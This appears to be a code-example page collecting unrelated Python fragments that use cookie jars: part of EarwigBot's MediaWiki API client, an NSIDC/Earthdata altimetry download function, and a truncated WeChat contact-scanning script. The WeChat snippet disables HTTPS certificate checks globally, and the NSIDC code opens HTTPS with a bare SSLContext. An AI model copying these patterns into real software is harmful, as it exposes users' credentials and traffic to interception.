        self._sql_info_cache = {"replag": 0, "lastcheck": 0, "usable": None}

        # Attribute used in copyright violation checks (see CopyrightMixIn):
        if search_config:
            self._search_config = search_config
        else:
            self._search_config = {}

        # Set up cookiejar and URL opener for making API queries:
        if cookiejar is not None:
            self._cookiejar = cookiejar
        else:
            self._cookiejar = CookieJar()
        if not user_agent:
            user_agent = constants.USER_AGENT  # Set default UA
        self._opener = build_opener(HTTPCookieProcessor(self._cookiejar))
        self._opener.addheaders = [("User-Agent", user_agent),
                                   ("Accept-Encoding", "gzip")]

        # Set up our internal logger:
        if logger:
            self._logger = logger
        else:  # Just set up a null logger to eat up our messages:
            self._logger = getLogger("earwigbot.wiki")
            self._logger.addHandler(NullHandler())

        # Get all of the above attributes that were not specified as arguments:
        self._load_attributes()

        # If we have a name/pass and the API says we're not logged in, log in:
        self._login_info = name, password = login
        if name and password:
            logged_in_as = self._get_username_from_cookies()
            if not logged_in_as or name.replace("_", " ") != logged_in_as:
                self._login(login)

    def __repr__(self):
        """Return the canonical string representation of the Site."""
        res = ", ".join((
            "Site(name={_name!r}", "project={_project!r}", "lang={_lang!r}",
            "base_url={_base_url!r}", "article_path={_article_path!r}",
            "script_path={_script_path!r}", "use_https={_use_https!r}",
            "assert_edit={_assert_edit!r}", "maxlag={_maxlag!r}",
            "sql={_sql_data!r}", "login={0}", "user_agent={2!r}",
            "cookiejar={1})"))
        name, password = self._login_info
        login = "******".format(repr(name), "hidden" if password else None)
        cookies = self._cookiejar.__class__.__name__
        if hasattr(self._cookiejar, "filename"):
            cookies += "({0!r})".format(getattr(self._cookiejar, "filename"))
        else:
            cookies += "()"
        agent = self._opener.addheaders[0][1]
        return res.format(login, cookies, agent, **self.__dict__)

    def __str__(self):
        """Return a nice string representation of the Site."""
        res = "<Site {0} ({1}:{2}) at {3}>"
        return res.format(self.name, self.project, self.lang, self.domain)

    def _unicodeify(self, value, encoding="utf8"):
        """Return input as unicode if it's not unicode to begin with."""
        if isinstance(value, unicode):
            return value
        return unicode(value, encoding)

    def _urlencode_utf8(self, params):
        """Implement urllib.urlencode() with support for unicode input."""
        enc = lambda s: s.encode("utf8") if isinstance(s, unicode) else str(s)
        args = []
        for key, val in params.iteritems():
            key = quote_plus(enc(key))
            val = quote_plus(enc(val))
            args.append(key + "=" + val)
        return "&".join(args)

    def _api_query(self, params, tries=0, wait=5, ignore_maxlag=False):
        """Do an API query with *params* as a dict of parameters.

        See the documentation for :py:meth:`api_query` for full implementation
        details.
        """
        since_last_query = time() - self._last_query_time  # Throttling support
        if since_last_query < self._wait_between_queries:
            wait_time = self._wait_between_queries - since_last_query
            log = "Throttled: waiting {0} seconds".format(round(wait_time, 2))
            self._logger.debug(log)
            sleep(wait_time)
        self._last_query_time = time()

        url, data = self._build_api_query(params, ignore_maxlag)
        if "lgpassword" in params:
            self._logger.debug("{0} -> <hidden>".format(url))
        else:
            self._logger.debug("{0} -> {1}".format(url, data))

        try:
            response = self._opener.open(url, data)
        except URLError as error:
            if hasattr(error, "reason"):
                e = "API query failed: {0}.".format(error.reason)
            elif hasattr(error, "code"):
                e = "API query failed: got an error code of {0}."
                e = e.format(error.code)
            else:
                e = "API query failed."
            raise exceptions.APIError(e)

        result = response.read()
        if response.headers.get("Content-Encoding") == "gzip":
            stream = StringIO(result)
            gzipper = GzipFile(fileobj=stream)
            result = gzipper.read()

        return self._handle_api_query_result(result, params, tries, wait)

    def _build_api_query(self, params, ignore_maxlag):
        """Given API query params, return the URL to query and POST data."""
        if not self._base_url or self._script_path is None:
            e = "Tried to do an API query, but no API URL is known."
            raise exceptions.APIError(e)

        url = ''.join((self.url, self._script_path, "/api.php"))
        params["format"] = "json"  # This is the only format we understand
        if self._assert_edit:  # If requested, ensure that we're logged in
            params["assert"] = self._assert_edit
        if self._maxlag and not ignore_maxlag:
            # If requested, don't overload the servers:
            params["maxlag"] = self._maxlag

        data = self._urlencode_utf8(params)
        return url, data

    def _handle_api_query_result(self, result, params, tries, wait):
        """Given the result of an API query, attempt to return useful data."""
        try:
            res = loads(result)  # Try to parse as a JSON object
        except ValueError:
            e = "API query failed: JSON could not be decoded."
            raise exceptions.APIError(e)

        try:
            code = res["error"]["code"]
            info = res["error"]["info"]
        except (TypeError, KeyError):  # Having these keys indicates a problem
            return res  # All is well; return the decoded JSON

        if code == "maxlag":  # We've been throttled by the server
            if tries >= self._max_retries:
                e = "Maximum number of retries reached ({0})."
                raise exceptions.APIError(e.format(self._max_retries))
            tries += 1
            msg = 'Server says "{0}"; retrying in {1} seconds ({2}/{3})'
            self._logger.info(msg.format(info, wait, tries, self._max_retries))
            sleep(wait)
            return self._api_query(params, tries=tries, wait=wait*2)
        else:  # Some unknown error occurred
            e = 'API query failed: got error "{0}"; server says: "{1}".'
            error = exceptions.APIError(e.format(code, info))
            error.code, error.info = code, info
            raise error

    def _load_attributes(self, force=False):
        """Load data about our Site from the API.

        This function is called by __init__() when one of the site attributes
        was not given as a keyword argument. We'll do an API query to get the
        missing data, but only if there actually *is* missing data.

        Additionally, you can call this with *force* set to True to forcibly
        reload all attributes.
        """
        # All attributes to be loaded, except _namespaces, which is a special
        # case because it requires additional params in the API query:
        attrs = [self._name, self._project, self._lang, self._base_url,
            self._article_path, self._script_path]

        params = {"action": "query", "meta": "siteinfo", "siprop": "general"}

        if not self._namespaces or force:
            params["siprop"] += "|namespaces|namespacealiases"
            result = self.api_query(**params)
            self._load_namespaces(result)
        elif all(attrs):  # Everything is already specified and we're not told
            return        # to force a reload, so do nothing
        else:  # We're only loading attributes other than _namespaces
            result = self.api_query(**params)

        res = result["query"]["general"]
        self._name = res["wikiid"]
        self._project = res["sitename"].lower()
        self._lang = res["lang"]
        self._base_url = res["server"]
        self._article_path = res["articlepath"]
        self._script_path = res["scriptpath"]

    def _load_namespaces(self, result):
        """Fill self._namespaces with a dict of namespace IDs and names.

        Called by _load_attributes() with API data as *result* when
        self._namespaces was not given as an kwarg to __init__().
        """
        self._namespaces = {}

        for namespace in result["query"]["namespaces"].values():
            ns_id = namespace["id"]
            name = namespace["*"]
            try:
                canonical = namespace["canonical"]
            except KeyError:
                self._namespaces[ns_id] = [name]
            else:
                if name != canonical:
                    self._namespaces[ns_id] = [name, canonical]
                else:
                    self._namespaces[ns_id] = [name]

        for namespace in result["query"]["namespacealiases"]:
            ns_id = namespace["id"]
            alias = namespace["*"]
            self._namespaces[ns_id].append(alias)

    def _get_cookie(self, name, domain):
        """Return the named cookie unless it is expired or doesn't exist."""
        for cookie in self._cookiejar:
            if cookie.name == name and cookie.domain == domain:
                if cookie.is_expired():
                    break
                return cookie

    def _get_username_from_cookies(self):
        """Try to return our username based solely on cookies.

        First, we'll look for a cookie named self._name + "Token", like
        "enwikiToken". If it exists and isn't expired, we'll assume it's valid
        and try to return the value of the cookie self._name + "UserName" (like
        "enwikiUserName"). This should work fine on wikis without single-user
        login.

        If `enwikiToken` doesn't exist, we'll try to find a cookie named
        `centralauth_Token`. If this exists and is not expired, we'll try to
        return the value of `centralauth_User`.

        If we didn't get any matches, we'll return None. Our goal here isn't to
        return the most likely username, or what we *want* our username to be
        (for that, we'd do self._login_info[0]), but rather to get our current
        username without an unnecessary ?action=query&meta=userinfo API query.
        """
        name = ''.join((self._name, "Token"))
        cookie = self._get_cookie(name, self.domain)

        if cookie:
            name = ''.join((self._name, "UserName"))
            user_name = self._get_cookie(name, self.domain)
            if user_name:
                return unquote_plus(user_name.value)

        for cookie in self._cookiejar:
            if cookie.name != "centralauth_Token" or cookie.is_expired():
                continue
            base = cookie.domain
            if base.startswith(".") and not cookie.domain_initial_dot:
                base = base[1:]
            if self.domain.endswith(base):
                user_name = self._get_cookie("centralauth_User", cookie.domain)
                if user_name:
                    return unquote_plus(user_name.value)

    def _get_username_from_api(self):
        """Do a simple API query to get our username and return it.

        This is a reliable way to make sure we are actually logged in, because
        it doesn't deal with annoying cookie logic, but it results in an API
        query that is unnecessary in some cases.

        Called by _get_username() (in turn called by get_user() with no
        username argument) when cookie lookup fails, probably indicating that
        we are logged out.
        """
        result = self.api_query(action="query", meta="userinfo")
        return result["query"]["userinfo"]["name"]

    def _get_username(self):
        """Return the name of the current user, whether logged in or not.

        First, we'll try to deduce it solely from cookies, to avoid an
        unnecessary API query. For the cookie-detection method, see
        _get_username_from_cookies()'s docs.

        If our username isn't in cookies, then we're probably not logged in, or
        something fishy is going on (like forced logout). In this case, do a
        single API query for our username (or IP address) and return that.
        """
        name = self._get_username_from_cookies()
        if name:
            return name
        return self._get_username_from_api()

    def _save_cookiejar(self):
        """Try to save our cookiejar after doing a (normal) login or logout.

        Calls the standard .save() method with no filename. Don't fret if our
        cookiejar doesn't support saving (CookieJar raises AttributeError,
        FileCookieJar raises NotImplementedError) or no default filename was
        given (LWPCookieJar and MozillaCookieJar raise ValueError).
        """
        if hasattr(self._cookiejar, "save"):
            try:
                getattr(self._cookiejar, "save")()
            except (NotImplementedError, ValueError):
                pass

    def _login(self, login, token=None, attempt=0):
        """Safely login through the API.

        Normally, this is called by __init__() if a username and password have
        been provided and no valid login cookies were found. The only other
        time it needs to be called is when those cookies expire, which is done
        automatically by api_query() if a query fails.

        Recent versions of MediaWiki's API have fixed a CSRF vulnerability,
        requiring login to be done in two separate requests. If the response
        from from our initial request is "NeedToken", we'll do another one with
        the token. If login is successful, we'll try to save our cookiejar.

        Raises LoginError on login errors (duh), like bad passwords and
        nonexistent usernames.

        *login* is a (username, password) tuple. *token* is the token returned
        from our first request, and *attempt* is to prevent getting stuck in a
        loop if MediaWiki isn't acting right.
        """
        name, password = login
        if token:
            result = self.api_query(action="login", lgname=name,
                                    lgpassword=password, lgtoken=token)
        else:
            result = self.api_query(action="login", lgname=name,
                                    lgpassword=password)

        res = result["login"]["result"]
        if res == "Success":
            self._save_cookiejar()
        elif res == "NeedToken" and attempt == 0:
            token = result["login"]["token"]
            return self._login(login, token, attempt=1)
        else:
            if res == "Illegal":
                e = "The provided username is illegal."
            elif res == "NotExists":
                e = "The provided username does not exist."
            elif res == "EmptyPass":
                e = "No password was given."
            elif res == "WrongPass" or res == "WrongPluginPass":
                e = "The given password is incorrect."
            else:
                e = "Couldn't login; server says '{0}'.".format(res)
            raise exceptions.LoginError(e)

    def _logout(self):
        """Safely logout through the API.

        We'll do a simple API request (api.php?action=logout), clear our
        cookiejar (which probably contains now-invalidated cookies) and try to
        save it, if it supports that sort of thing.
        """
        self.api_query(action="logout")
        self._cookiejar.clear()
        self._save_cookiejar()

    def _sql_connect(self, **kwargs):
        """Attempt to establish a connection with this site's SQL database.

        oursql.connect() will be called with self._sql_data as its kwargs.
        Any kwargs given to this function will be passed to connect() and will
        have precedence over the config file.

        Will raise SQLError() if the module "oursql" is not available. oursql
        may raise its own exceptions (e.g. oursql.InterfaceError) if it cannot
        establish a connection.
        """
        if not oursql:
            e = "Module 'oursql' is required for SQL queries."
            raise exceptions.SQLError(e)

        args = self._sql_data
        for key, value in kwargs.iteritems():
            args[key] = value

        if "read_default_file" not in args and "user" not in args and "passwd" not in args:
            args["read_default_file"] = expanduser("~/.my.cnf")

        if "autoping" not in args:
            args["autoping"] = True

        if "autoreconnect" not in args:
            args["autoreconnect"] = True

        self._sql_conn = oursql.connect(**args)

    def _get_service_order(self):
        """Return a preferred order for using services (e.g. the API and SQL).

        A list is returned, starting with the most preferred service first and
        ending with the least preferred one. Currently, there are only two
        services. SERVICE_API will always be included since the API is expected
        to be always usable. In normal circumstances, self.SERVICE_SQL will be
        first (with the API second), since using SQL directly is easier on the
        servers than making web queries with the API. self.SERVICE_SQL will be
        second if replag is greater than three minutes (a cached value updated
        every two minutes at most), *unless* API lag is also very high.
        self.SERVICE_SQL will not be included in the list if we cannot form a
        proper SQL connection.
        """
        now = time()
        if now - self._sql_info_cache["lastcheck"] > 120:
            self._sql_info_cache["lastcheck"] = now
            try:
                self._sql_info_cache["replag"] = sqllag = self.get_replag()
            except (exceptions.SQLError, oursql.Error):
                self._sql_info_cache["usable"] = False
                return [self.SERVICE_API]
            self._sql_info_cache["usable"] = True
        else:
            if not self._sql_info_cache["usable"]:
                return [self.SERVICE_API]
            sqllag = self._sql_info_cache["replag"]

        if sqllag > 300:
            if not self._maxlag:
                return [self.SERVICE_API, self.SERVICE_SQL]
            if now - self._api_info_cache["lastcheck"] > 300:
                self._api_info_cache["lastcheck"] = now
                try:
                    self._api_info_cache["maxlag"] = apilag = self.get_maxlag()
                except exceptions.APIError:
                    self._api_info_cache["maxlag"] = apilag = 0
            else:
                apilag = self._api_info_cache["maxlag"]
            if apilag > self._maxlag:
                return [self.SERVICE_SQL, self.SERVICE_API]
            return [self.SERVICE_API, self.SERVICE_SQL]

        return [self.SERVICE_SQL, self.SERVICE_API]

    @property
    def name(self):
        """The Site's name (or "wikiid" in the API), like ``"enwiki"``."""
        return self._name

    @property
    def project(self):
        """The Site's project name in lowercase, like ``"wikipedia"``."""
        return self._project

    @property
    def lang(self):
        """The Site's language code, like ``"en"`` or ``"es"``."""
        return self._lang

    @property
    def domain(self):
        """The Site's web domain, like ``"en.wikipedia.org"``."""
        return urlparse(self._base_url).netloc

    @property
    def url(self):
        """The Site's full base URL, like ``"https://en.wikipedia.org"``."""
        url = self._base_url
        if url.startswith("//"):  # Protocol-relative URLs from 1.18
            if self._use_https:
                url = "https:" + url
            else:
                url = "http:" + url
        return url

    def api_query(self, **kwargs):
        """Do an API query with `kwargs` as the parameters.

        This will first attempt to construct an API url from
        :py:attr:`self._base_url` and :py:attr:`self._script_path`. We need
        both of these, or else we'll raise
        :py:exc:`~earwigbot.exceptions.APIError`. If
        :py:attr:`self._base_url` is protocol-relative (introduced in MediaWiki
        1.18), we'll choose HTTPS only if :py:attr:`self._user_https` is
        ``True``, otherwise HTTP.

        We'll encode the given params, adding ``format=json`` along the way, as
        well as ``&assert=`` and ``&maxlag=`` based on
        :py:attr:`self._assert_edit` and :py:attr:`_maxlag` respectively.
        Additionally, we'll sleep a bit if the last query was made fewer than
        :py:attr:`self._wait_between_queries` seconds ago. The request is made
        through :py:attr:`self._opener`, which has cookie support
        (:py:attr:`self._cookiejar`), a ``User-Agent``
        (:py:const:`earwigbot.wiki.constants.USER_AGENT`), and
        ``Accept-Encoding`` set to ``"gzip"``.

        Assuming everything went well, we'll gunzip the data (if compressed),
        load it as a JSON object, and return it.

        If our request failed for some reason, we'll raise
        :py:exc:`~earwigbot.exceptions.APIError` with details. If that
        reason was due to maxlag, we'll sleep for a bit and then repeat the
        query until we exceed :py:attr:`self._max_retries`.

        There is helpful MediaWiki API documentation at `MediaWiki.org
        <http://www.mediawiki.org/wiki/API>`_.
        """
        with self._api_lock:
            return self._api_query(kwargs)

    def sql_query(self, query, params=(), plain_query=False, dict_cursor=False,
                  cursor_class=None, show_table=False):
        """Do an SQL query and yield its results.

        If *plain_query* is ``True``, we will force an unparameterized query.
        Specifying both *params* and *plain_query* will cause an error. If
        *dict_cursor* is ``True``, we will use :py:class:`oursql.DictCursor` as
        our cursor, otherwise the default :py:class:`oursql.Cursor`. If
        *cursor_class* is given, it will override this option. If *show_table*
        is True, the name of the table will be prepended to the name of the
        column. This will mainly affect an :py:class:`~oursql.DictCursor`.

        Example usage::

            >>> query = "SELECT user_id, user_registration FROM user WHERE user_name = ?"
            >>> params = ("The Earwig",)
            >>> result1 = site.sql_query(query, params)
            >>> result2 = site.sql_query(query, params, dict_cursor=True)
            >>> for row in result1: print row
            (7418060L, '20080703215134')
            >>> for row in result2: print row
            {'user_id': 7418060L, 'user_registration': '20080703215134'}

        This may raise :py:exc:`~earwigbot.exceptions.SQLError` or one of
        oursql's exceptions (:py:exc:`oursql.ProgrammingError`,
        :py:exc:`oursql.InterfaceError`, ...) if there were problems with the
        query.

        See :py:meth:`_sql_connect` for information on how a connection is
        acquired. Also relevant is `oursql's documentation
        <http://packages.python.org/oursql>`_ for details on that package.
        """
        if not cursor_class:
            if dict_cursor:
                cursor_class = oursql.DictCursor
            else:
                cursor_class = oursql.Cursor
        klass = cursor_class

        with self._sql_lock:
            if not self._sql_conn:
                self._sql_connect()
            with self._sql_conn.cursor(klass, show_table=show_table) as cur:
                cur.execute(query, params, plain_query)
                for result in cur:
                    yield result

    def get_maxlag(self, showall=False):
        """Return the internal database replication lag in seconds.

        In a typical setup, this function returns the replication lag *within*
        the WMF's cluster, *not* external replication lag affecting the
        Toolserver (see :py:meth:`get_replag` for that). This is useful when
        combined with the ``maxlag`` API query param (added by config), in
        which queries will be halted and retried if the lag is too high,
        usually above five seconds.

        With *showall*, will return a list of the lag for all servers in the
        cluster, not just the one with the highest lag.
        """
        params = {"action": "query", "meta": "siteinfo", "siprop": "dbrepllag"}
        if showall:
            params["sishowalldb"] = 1
        with self._api_lock:
            result = self._api_query(params, ignore_maxlag=True)
        if showall:
            return [server["lag"] for server in result["query"]["dbrepllag"]]
        return result["query"]["dbrepllag"][0]["lag"]

    def get_replag(self):
        """Return the estimated external database replication lag in seconds.

        Requires SQL access. This function only makes sense on a replicated
        database (e.g. the Wikimedia Toolserver) and on a wiki that receives a
        large number of edits (ideally, at least one per second), or the result
        may be larger than expected, since it works by subtracting the current
        time from the timestamp of the latest recent changes event.

        This may raise :py:exc:`~earwigbot.exceptions.SQLError` or one of
        oursql's exceptions (:py:exc:`oursql.ProgrammingError`,
        :py:exc:`oursql.InterfaceError`, ...) if there were problems.
        """
        query = """SELECT UNIX_TIMESTAMP() - UNIX_TIMESTAMP(rc_timestamp) FROM
                   recentchanges ORDER BY rc_timestamp DESC LIMIT 1"""
        result = list(self.sql_query(query))
        return result[0][0]

    def namespace_id_to_name(self, ns_id, all=False):
        """Given a namespace ID, returns associated namespace names.

        If *all* is ``False`` (default), we'll return the first name in the
        list, which is usually the localized version. Otherwise, we'll return
        the entire list, which includes the canonical name. For example, this
        returns ``u"Wikipedia"`` if *ns_id* = ``4`` and *all* is ``False`` on
        ``enwiki``; returns ``[u"Wikipedia", u"Project", u"WP"]`` if *ns_id* =
        ``4`` and *all* is ``True``.

        Raises :py:exc:`~earwigbot.exceptions.NamespaceNotFoundError` if the ID
        is not found.
        """
        try:
            if all:
                return self._namespaces[ns_id]
            else:
                return self._namespaces[ns_id][0]
        except KeyError:
            e = "There is no namespace with id {0}.".format(ns_id)
            raise exceptions.NamespaceNotFoundError(e)

    def namespace_name_to_id(self, name):
        """Given a namespace name, returns the associated ID.

        Like :py:meth:`namespace_id_to_name`, but reversed. Case is ignored,
        because namespaces are assumed to be case-insensitive.

        Raises :py:exc:`~earwigbot.exceptions.NamespaceNotFoundError` if the
        name is not found.
        """
        lname = name.lower()
        for ns_id, names in self._namespaces.items():
            lnames = [n.lower() for n in names]  # Be case-insensitive
            if lname in lnames:
                return ns_id

        e = "There is no namespace with name '{0}'.".format(name)
        raise exceptions.NamespaceNotFoundError(e)

    def get_page(self, title, follow_redirects=False, pageid=None):
        """Return a :py:class:`Page` object for the given title.

        *follow_redirects* is passed directly to
        :py:class:`~earwigbot.wiki.page.Page`'s constructor. Also, this will
        return a :py:class:`~earwigbot.wiki.category.Category` object instead
        if the given title is in the category namespace. As
        :py:class:`~earwigbot.wiki.category.Category` is a subclass of
        :py:class:`~earwigbot.wiki.page.Page`, this should not cause problems.

        Note that this doesn't do any direct checks for existence or
        redirect-following: :py:class:`~earwigbot.wiki.page.Page`'s methods
        provide that.
        """
        title = self._unicodeify(title)
        prefixes = self.namespace_id_to_name(constants.NS_CATEGORY, all=True)
        prefix = title.split(":", 1)[0]
        if prefix != title:  # Avoid a page that is simply "Category"
            if prefix in prefixes:
                return Category(self, title, follow_redirects, pageid,
                                self._logger)
        return Page(self, title, follow_redirects, pageid, self._logger)

    def get_category(self, catname, follow_redirects=False, pageid=None):
        """Return a :py:class:`Category` object for the given category name.

        *catname* should be given *without* a namespace prefix. This method is
        really just shorthand for :py:meth:`get_page("Category:" + catname)
        <get_page>`.
        """
        catname = self._unicodeify(catname)
        prefix = self.namespace_id_to_name(constants.NS_CATEGORY)
        pagename = u':'.join((prefix, catname))
        return Category(self, pagename, follow_redirects, pageid, self._logger)

    def get_user(self, username=None):
        """Return a :py:class:`User` object for the given username.

        If *username* is left as ``None``, then a
        :py:class:`~earwigbot.wiki.user.User` object representing the currently
        logged-in (or anonymous!) user is returned.
        """
        if username:
            username = self._unicodeify(username)
        else:
            username = self._get_username()
        return User(self, username, self._logger)

    def delegate(self, services, args=None, kwargs=None):
        """Delegate a task to either the API or SQL depending on conditions.

        *services* should be a dictionary in which the key is the service name
        (:py:attr:`self.SERVICE_API <SERVICE_API>` or
        :py:attr:`self.SERVICE_SQL <SERVICE_SQL>`), and the value is the
        function to call for this service. All functions will be passed the
        same arguments the tuple *args* and the dict **kwargs**, which are both
        empty by default. The service order is determined by
        :py:meth:`_get_service_order`.

        Not every service needs an entry in the dictionary. Will raise
        :py:exc:`~earwigbot.exceptions.NoServiceError` if an appropriate
        service cannot be found.
        """
        if not args:
            args = ()
        if not kwargs:
            kwargs = {}

        order = self._get_service_order()
        for srv in order:
            if srv in services:
                try:
                    return services[srv](*args, **kwargs)
                except exceptions.ServiceError:
                    continue
        raise exceptions.NoServiceError(services)
def nsidc_subset_altimetry(filepath, PRODUCT, VERSION, USER='', PASSWORD='',
    BBOX=None, POLYGON=None, TIME=None, FORMAT=None, MODE=None, CLOBBER=False,
    VERBOSE=False, UNZIP=False):

    #-- https://docs.python.org/3/howto/urllib2.html#id5
    #-- create a password manager
    password_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
    #-- Add the username and password for NASA Earthdata Login system
    password_mgr.add_password(None, 'https://urs.earthdata.nasa.gov',
        USER, PASSWORD)
    #-- Encode username/password for request authorization headers
    base64_string = base64.b64encode('{0}:{1}'.format(USER,PASSWORD).encode())
    #-- Create cookie jar for storing cookies. This is used to store and return
    #-- the session cookie given to use by the data server (otherwise will just
    #-- keep sending us back to Earthdata Login to authenticate).
    cookie_jar = CookieJar()
    #-- create "opener" (OpenerDirector instance)
    opener = urllib2.build_opener(
        urllib2.HTTPBasicAuthHandler(password_mgr),
        urllib2.HTTPSHandler(context=ssl.SSLContext()),
        urllib2.HTTPCookieProcessor(cookie_jar))
    #-- add Authorization header to opener
    authorization_header = "Basic {0}".format(base64_string.decode())
    opener.addheaders = [("Authorization", authorization_header)]
    #-- Now all calls to urllib2.urlopen use our opener.
    urllib2.install_opener(opener)
    #-- All calls to urllib2.urlopen will now use handler
    #-- Make sure not to include the protocol in with the URL, or
    #-- HTTPPasswordMgrWithDefaultRealm will be confused.

    #-- compile lxml xml parser
    parser = lxml.etree.XMLParser(recover=True, remove_blank_text=True)

    #-- product and version flags
    product_flag = '?short_name={0}'.format(PRODUCT)
    version_flag = '&version={0}'.format(VERSION) if VERSION else ''

    #-- if using time start and end to temporally subset data
    if TIME:
        #-- verify that start and end times are in ISO format
        start_time = dateutil.parser.parse(TIME[0]).isoformat()
        end_time = dateutil.parser.parse(TIME[1]).isoformat()
        time_flag = '&time={0},{1}'.format(start_time, end_time)
        temporal_flag = '&temporal={0},{1}'.format(start_time, end_time)
    else:
        time_flag = ''
        temporal_flag = ''

    #-- spatially subset data using bounding box or polygon file
    if BBOX:
        #-- if using a bounding box to spatially subset data
        #-- min_lon,min_lat,max_lon,max_lat
        bounds_flag = '&bounding_box={0:f},{1:f},{2:f},{3:f}'.format(*BBOX)
        spatial_flag = '&bbox={0:f},{1:f},{2:f},{3:f}'.format(*BBOX)
    elif POLYGON:
        #-- read shapefile or kml/kmz file
        fileBasename,fileExtension = os.path.splitext(POLYGON)
        #-- extract file name and subsetter indices lists
        match_object = re.match('(.*?)(\[(.*?)\])?$',POLYGON)
        FILE = os.path.expanduser(match_object.group(1))
        #-- read specific variables of interest
        v = match_object.group(3).split(',') if match_object.group(2) else None
        #-- get MultiPolygon object from input spatial file
        if fileExtension in ('.shp','.zip'):
            #-- if reading a shapefile or a zipped directory with a shapefile
            ZIP = (fileExtension == '.zip')
            m = read_shapefile(os.path.expanduser(FILE), VARIABLES=v, ZIP=ZIP)
        elif fileExtension in ('.kml','.kmz'):
            #-- if reading a keyhole markup language (can be compressed)
            KMZ = (fileExtension == '.kmz')
            m = read_kml_file(os.path.expanduser(FILE), VARIABLES=v, KMZ=KMZ)
        elif fileExtension in ('.json','.geojson'):
            #-- if reading a GeoJSON file
            m = read_geojson_file(os.path.expanduser(FILE), VARIABLES=v)
        else:
            raise IOError('Unlisted polygon type ({0})'.format(fileExtension))
        #-- calculate the bounds of the MultiPolygon object
        bounds_flag = '&bounding_box={0:f},{1:f},{2:f},{3:f}'.format(*m.bounds)
        #-- calculate the convex hull of the MultiPolygon object for subsetting
        #-- the NSIDC api requires polygons to be in counter-clockwise order
        X,Y = shapely.geometry.polygon.orient(m.convex_hull,sign=1).exterior.xy
        #-- coordinate order for polygon flag is lon1,lat1,lon2,lat2,...
        polygon_flag = ','.join(['{0:f},{1:f}'.format(x,y) for x,y in zip(X,Y)])
        spatial_flag = '&polygon={0}'.format(polygon_flag)
    else:
        #-- do not spatially subset data
        bounds_flag = ''
        spatial_flag = ''

    #-- if changing the output format
    format_flag = '&format={0}'.format(FORMAT) if FORMAT else ''

    #-- get dictionary of granules for temporal and spatial subset
    HOST = posixpath.join('https://cmr.earthdata.nasa.gov','search','granules')
    page_size,page_num = (10,1)
    granules = {}
    FLAG = True
    #-- reduce to a set number of files per page and then iterate through pages
    while FLAG:
        #-- flags for page size and page number
        size_flag = '&page_size={0:d}'.format(page_size)
        num_flag = '&page_num={0:d}'.format(page_num)
        #-- url for page
        remote_url = ''.join([HOST,product_flag,version_flag,bounds_flag,
            temporal_flag,size_flag,num_flag])
        #-- Create and submit request. There are a wide range of exceptions
        #-- that can be thrown here, including HTTPError and URLError.
        request = urllib2.Request(remote_url)
        tree = lxml.etree.parse(urllib2.urlopen(request, timeout=20), parser)
        root = tree.getroot()
        #-- total number of hits for subset (not just on page)
        hits = int(tree.find('hits').text)
        #-- extract references on page
        references = [i for i in tree.iter('reference',root.nsmap)]
        #-- check flag
        FLAG = (len(references) > 0)
        for reference in references:
            name = reference.find('name',root.nsmap).text
            id = reference.find('id',root.nsmap).text
            location = reference.find('location',root.nsmap).text
            revision_id = reference.find('revision-id',root.nsmap).text
            #-- read cmd location to get filename
            req = urllib2.Request(location)
            #-- parse cmd location url
            tr = lxml.etree.parse(urllib2.urlopen(req, timeout=20), parser)
            r = tr.getroot()
            f,=tr.xpath('.//gmd:fileIdentifier/gmx:FileName',namespaces=r.nsmap)
            #-- create list of id, cmd location, revision and file
            granules[name] = [id,location,revision_id,f.text]
        #-- add to page number if valid page
        page_num += 1 if FLAG else 0

    #-- for each page of data
    for p in range(1,page_num):
        #-- flags for page size and page number
        size_flag = '&page_size={0:d}'.format(page_size)
        num_flag = '&page_num={0:d}'.format(p)
        #-- remote https server for page of NSIDC Data
        HOST = posixpath.join('https://n5eil02u.ecs.nsidc.org','egi','request')
        remote_url = ''.join([HOST,product_flag,version_flag,bounds_flag,
            spatial_flag,time_flag,format_flag,size_flag,num_flag])

        #-- local file
        today = time.strftime('%Y-%m-%dT%H-%M-%S',time.localtime())
        #-- download as either zipped file (default) or unzip to a directory
        if UNZIP:
            #-- Create and submit request. There are a wide range of exceptions
            #-- that can be thrown here, including HTTPError and URLError.
            request = urllib2.Request(remote_url)
            response = urllib2.urlopen(request)
            #-- read to BytesIO object
            fid = io.BytesIO(response.read())
            #-- use zipfile to extract contents from bytes
            remote_data = zipfile.ZipFile(fid)
            subdir = '{0}_{1}'.format(PRODUCT,today)
            print('{0} -->\n'.format(remote_url)) if VERBOSE else None
            #-- extract each member and convert permissions to MODE
            for member in remote_data.filelist:
                local_file = os.path.join(filepath,subdir,member.filename)
                print('\t{0}\n'.format(local_file)) if VERBOSE else None
                remote_data.extract(member, path=os.path.join(filepath,subdir))
                os.chmod(local_file, MODE)
            #-- close the zipfile object
            remote_data.close()
        else:
            #-- Printing files transferred if VERBOSE
            local_zip=os.path.join(filepath,'{0}_{1}.zip'.format(PRODUCT,today))
            args = (remote_url,local_zip)
            print('{0} -->\n\t{1}\n'.format(*args)) if VERBOSE else None
            #-- Create and submit request. There are a wide range of exceptions
            #-- that can be thrown here, including HTTPError and URLError.
            request = urllib2.Request(remote_url)
            response = urllib2.urlopen(request)
            #-- copy contents to local file using chunked transfer encoding
            #-- transfer should work properly with ascii and binary data formats
            CHUNK = 16 * 1024
            with open(local_zip, 'wb') as f:
                shutil.copyfileobj(response, f, CHUNK)
            #-- keep remote modification time of file and local access time
            # os.utime(local_zip, (os.stat(local_zip).st_atime, remote_mtime))
            #-- convert permissions to MODE
            os.chmod(local_zip, MODE)
Example #60
0
def main():

    try:
        ssl._create_default_https_context = ssl._create_unverified_context

        opener = wdf_urllib.build_opener(
            wdf_urllib.HTTPCookieProcessor(CookieJar()))
        wdf_urllib.install_opener(opener)
    except:
        pass

    if not getUUID():
        print('获取uuid失败')
        return

    showQRImage()
    time.sleep(1)

    while waitForLogin() != '200':
        pass

    os.remove(QRImagePath)

    if not login():
        print('登录失败')
        return

    if not webwxinit():
        print('初始化失败')
        return

    MemberList = webwxgetcontact()

    MemberCount = len(MemberList)
    print('通讯录共%s位好友' % MemberCount)

    ChatRoomName = ''
    result = []
    d = {}
    for Member in MemberList:
        d[Member['UserName']] = (Member['NickName'].encode('utf-8'),
                                 Member['RemarkName'].encode('utf-8'))
    print('开始查找...')
    group_num = int(math.ceil(MemberCount / float(MAX_GROUP_NUM)))
    for i in range(0, group_num):
        UserNames = []
        for j in range(0, MAX_GROUP_NUM):
            if i * MAX_GROUP_NUM + j >= MemberCount:
                break
            Member = MemberList[i * MAX_GROUP_NUM + j]
            UserNames.append(Member['UserName'])

        # 新建群组/添加成员
